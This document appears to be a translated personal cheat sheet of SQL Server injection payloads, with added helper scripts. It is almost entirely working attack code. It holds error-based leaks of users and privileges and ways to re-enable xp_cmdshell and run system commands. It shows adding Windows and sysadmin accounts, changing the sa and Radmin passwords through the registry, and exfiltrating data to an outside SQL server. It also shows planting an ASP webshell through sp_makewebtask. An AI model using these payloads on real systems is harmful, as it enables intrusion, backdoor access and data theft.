My memory is not good, so this is a somewhat messy record of the injection code I use most often, but it is very useful to me and I hope everyone finds it useful too!
// Check permissions: is the current user a member of db_owner?
And 1=(Select IS_MEMBER('db_owner'))
And char(124)+Cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1;--
// Check whether the current login can access a given database (master here)
And 1=(Select HAS_DBACCESS('master'))
And char(124)+Cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1--
Note: the + is string concatenation; when the payload goes into a URL it must be sent as %2B, because a raw + in a query string decodes to a space. The char(124) ('|') on both sides makes the server raise a conversion error whose message quotes the value between the two bars, so the answer is readable even when the page never prints query results.
Injection point types (same probe, adapted to how the parameter is embedded in the query)
Numeric type
And char(124)+user+char(124)=0
Character type (closes the opening quote, then re-balances it)
' And char(124)+user+char(124)=0 and ''='
Search type (parameter sits inside a LIKE '%...%' pattern)
' And char(124)+user+char(124)=0 and '%'='
Leak the current user name (comparing the nvarchar user with an int forces a conversion error that quotes the name)
And user>0
' And user>0 and ''='
Check whether the login is sa (member of the sysadmin server role)
And 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1--
(0x7300...6E00 is N'sysadmin' written as a UTF-16LE hex literal; use it when single quotes are filtered.)
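The probes above all rely on the same conversion-error oracle. The following script is an added example, not part of the original cheat sheet: it runs the probes locally inside TRY...CATCH so you can see exactly which text a vulnerable page will leak before you fire them at a target. It assumes SQL Server 2005 or later (TRY...CATCH and ERROR_MESSAGE() do not exist on 2000, where you run the SELECT alone and read the raw error) and that you are connected as any login; no target, table or data is needed.

```sql
-- Added lab example (not from the cheat sheet). Assumes SQL Server 2005+.
SET NOCOUNT ON;

-- 1. Leak the current user name: the nvarchar result of user is compared
--    with an int, so the server converts it and the failed conversion
--    quotes the value in the error text.
BEGIN TRY
    SELECT 1 WHERE user > 0;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS leaked_user;
END CATCH;

-- 2. Wrap a yes/no check in char(124) ('|') so the answer stands out in the
--    message even when the page buries it in HTML.
BEGIN TRY
    SELECT 1
    WHERE char(124) + CAST(IS_SRVROLEMEMBER('sysadmin') AS varchar(1)) + char(124) = 1;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS leaked_sysadmin;
END CATCH;

-- 3. Same check with the role name as a UTF-16LE hex literal, for targets
--    that strip or escape single quotes; 0x7300...6E00 decodes to N'sysadmin'.
SELECT CAST(0x730079007300610064006D0069006E00 AS nvarchar(8)) AS decoded_role,
       IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)    AS is_sysadmin;

-- 4. Leak a row count through the same delimiter trick. The cheat sheet does
--    this against D99_Tmp; master.dbo.sysdatabases is used here because it
--    exists on every instance.
BEGIN TRY
    SELECT 1
    WHERE (SELECT char(124) + CAST(COUNT(1) AS varchar(8000)) + char(124)
           FROM master.dbo.sysdatabases) = 0;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS leaked_count;
END CATCH;
```

Each CATCH returns the same "Conversion failed" message the web application would echo, with the leaked value between the two bars. One caveat worth keeping in mind when reading results from a real target: IS_MEMBER, HAS_DBACCESS and IS_SRVROLEMEMBER return NULL (not 0) for a role or database name that does not exist, and '|'+NULL+'|' is NULL, so the comparison raises no error at all. Silence therefore means "unknown name", not "no".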
Check whether the back-end database is MSSQL
And exists(select * from sysobjects);--
Check whether stacked (multiple) statements are supported
;Declare @d int;--
Restore xp_cmdshell (SQL Server 2000: re-register it from xplog70.dll)
;Exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
Run a query against another SQL Server through OPENROWSET (outbound connection from the target)
Select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafsp','select @@version')
//-----------------------
// Execute commands
//-----------------------
Via the Jet provider: first switch the Jet sandbox off for non-Access callers:
Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Then run the system command through the Jet OLE DB provider's shell() expression:
Select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
Via OLE automation (sp_OACreate / sp_OAMethod):
;DECLARE @shell int;exec sp_oacreate 'wscript.shell',@shell output;exec sp_oamethod @shell,'run',null,'c:\WINNT\system32\cmd.exe /C net user paf pafpaf /add';--
Via xp_cmdshell:
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\8080'
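Before picking one of the three execution paths above it pays to check which one the target still allows. The script below is an added example, not part of the original cheat sheet. It assumes sysadmin rights on SQL Server 2005 or later: sys.configurations and the sp_configure switches do not exist on SQL Server 2000, where the sysobjects check and sp_addextendedproc from the cheat sheet are the whole story.

```sql
-- Added example (not from the cheat sheet). Assumes sysadmin on SQL Server 2005+.
SET NOCOUNT ON;

-- 1. Is xp_cmdshell still registered? (works on SQL Server 2000 and later)
SELECT COUNT(*) AS xp_cmdshell_registered
FROM master.dbo.sysobjects
WHERE xtype = 'X' AND name = 'xp_cmdshell';

-- 2. On 2005 and later each execution path is gated by a server option:
--    xp_cmdshell, OLE automation (sp_OACreate) and OPENROWSET/OPENDATASOURCE.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- 3. Jet sandbox: read SandBoxMode without writing it. 0 or 1 means
--    non-Access callers such as SQL Server are not sandboxed, so shell()
--    inside OPENROWSET is allowed; 2 or 3 (the default) blocks it.
DECLARE @sandbox int;
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
     'Software\Microsoft\Jet\4.0\Engines', 'SandBoxMode', @sandbox OUTPUT;
SELECT @sandbox AS jet_sandboxmode;

-- 4. Turn xp_cmdshell back on where it is only disabled, not dropped.
--    sp_addextendedproc 'xp_cmdshell','xplog70.dll' from the cheat sheet is
--    the SQL Server 2000 fix; on 2005 and later the procedure lives in
--    xpstar.dll and this configuration switch is what matters.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';
```

Two caveats for reading the output: a NULL sandbox value means the registry key is absent, usually because no Jet engine is installed; and on a 64-bit SQL Server the Jet 4.0 provider cannot be loaded at all (it is 32-bit only), so the OPENROWSET shell() path only applies to 32-bit instances. Every sp_configure change is logged in the SQL Server error log, so it is not a quiet step.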
Check whether the xp_cmdshell extended stored procedure exists (injected into a GET parameter):
http://www.bkjia.com/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND name='xp_cmdshell')
Write registry (value types REG_DWORD, REG_SZ and REG_BINARY are accepted)
Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Read registry
Exec master..xp_regread 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
List directory contents (depth 1, files included)
Exec master..xp_dirtree 'C:\winnt\system32\',1,1
Database backup (writes a file on the database server's disk)
Backup database pubs to disk='C:\123.bak'
// Leak the row count of a table (D99_Tmp here) through the conversion error
And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0;--
Change the sa password:
Exec sp_password NULL,'newpassword','sa'
Add a new login and make it sysadmin (test / ptlove here):
Exec master.dbo.sp_addlogin test,ptlove
Exec master.dbo.sp_addsrvrolemember test,sysadmin
Drop the xp_cmdshell extended stored procedure:
Exec sp_dropextendedproc 'xp_cmdshell'
Register an extended stored procedure from your own DLL and let every login run it:
EXEC [master]..sp_addextendedproc 'xp_proxiedadata','c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
Stop or start a service (the Task Scheduler service here):
Exec master..xp_servicecontrol 'stop','schedule'
Exec master..xp_servicecontrol 'start','schedule'
Other undocumented extended stored procedures (SQL Server 2000 era; several of them no longer exist in later versions):
xp_subdirs
Lists only the subdirectories of a directory.
xp_getfiledetails
Returns a file's size, dates and attributes:
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
xp_makecab
Compresses several files into one .cab file. Every file to be compressed is appended to the end of the parameter list, separated by commas:
xp_makecab 'C:\test.cab','mszip',1,'C:\Inetpub\wwwroot\SQLInject\login.asp','C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
Kills a running process; the parameter is its process ID. In Task Manager choose View, then Select Columns, to show the PID of each process.
xp_terminate_process 2484
xp_unpackcab
Extracts a .cab file:
xp_unpackcab 'C:\test.cab','c:\temp',1
A machine had Radmin installed, but its password had been changed, regedit.exe was missing (deleted or renamed) and net.exe did not exist, so there was no way to import a .reg file with regedit. MSSQL, however, was running with sa rights. Running
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c
changes the Radmin password to 12345678. To change the port as well:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Port','REG_BINARY',0xd20400
sets the port to 1234 (0x04d2 stored little-endian).
Exfiltrate query results to your own SQL Server with OPENDATASOURCE. On the receiving server (211.39.145.163 in this example) prepare a database and tables:
Create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
// Pull the database names from the target into the receiving table
Insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
// Create a table in master to test write permission
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
Use sp_makewebtask to write a one-line ASP webshell straight into the web directory (payload injected into the username parameter, URL-encoded):
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
Decoded, the injected statement is: exec sp_makewebtask 'd:\www\tt\88.asp',' select ''<%execute(request("a"))%>'' ';--
// Update table contents
Update films SET kind='Dramatic' Where id=123
// Delete rows
Delete from table_name where Stockid=3